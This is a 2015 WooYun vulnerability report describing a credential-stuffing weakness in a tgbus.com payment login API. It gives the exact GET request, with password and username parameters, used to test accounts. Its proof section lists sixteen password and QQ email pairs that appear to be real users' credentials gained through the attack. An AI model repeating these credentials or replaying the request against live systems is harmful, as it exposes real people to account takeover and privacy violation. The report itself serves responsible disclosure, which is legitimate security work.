当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140152

漏洞标题:电玩巴士某处接口问题导致帐号密码泄漏

相关厂商:电玩巴士

漏洞作者: sqlfeng

提交时间:2015-09-10 11:28

修复时间:2015-10-25 17:10

公开时间:2015-10-25 17:10

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-10: 细节已通知厂商并且等待厂商处理中
2015-09-10: 厂商已经确认,细节仅向厂商公开
2015-09-20: 细节向核心白帽子及相关领域专家公开
2015-09-30: 细节向普通白帽子公开
2015-10-10: 细节向实习白帽子公开
2015-10-25: 细节向公众公开

简要描述:

说白了就是撞库....

详细说明:

地址:http://pay.tgbus.com/interface/login.aspx?id=13

GET /api/checklogin.ashx?p=密码&r=0&random=0.9535509019624442&u=帐号&fn=FEIXUE_CALB_SINGLE_SETJSONADSLOT HTTP/1.1
Host: pay.tgbus.com
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Referer: http://pay.tgbus.com/interface/login.aspx?id=13
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_765e4a95eb8653564a947c539998a20a=1441797011; Hm_lpvt_765e4a95eb8653564a947c539998a20a=1441797011; ASP.NET_SessionId=3unl3r45tq04ix55fcyrylud
Connection: close


漏洞证明:

QQ截图20150909200741.png


QQ截图20150909200900.png


部分帐号密码

19880311	xin_wx@qq.com	
	8826217	        79140338@qq.com
        892220	        25976215@qq.com	
	19870126	wdgwgz@qq.com
	111111	        1111111@qq.com
	5201314	        5201314@qq.com
	z2581893	50409771@qq.com
	zzjsjting	38762941@qq.com
	1953556	        585537@qq.com
	27985181	10325728@qq.com	
	xm198733	xm198733@qq.com
	123456	         kiss9413@qq.com	
	as12313123	88348830@qq.com		
	liangpeng	lape1314@qq.com	
	asdasdasd	asdasd@qq.com	
	11111111	13037225@qq.com

修复方案:

验证,限制次数

版权声明:转载请注明来源 sqlfeng@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-09-10 17:09

厂商回复:

感谢洞主对完美世界的关注,我们将尽快修补。

最新状态:

暂无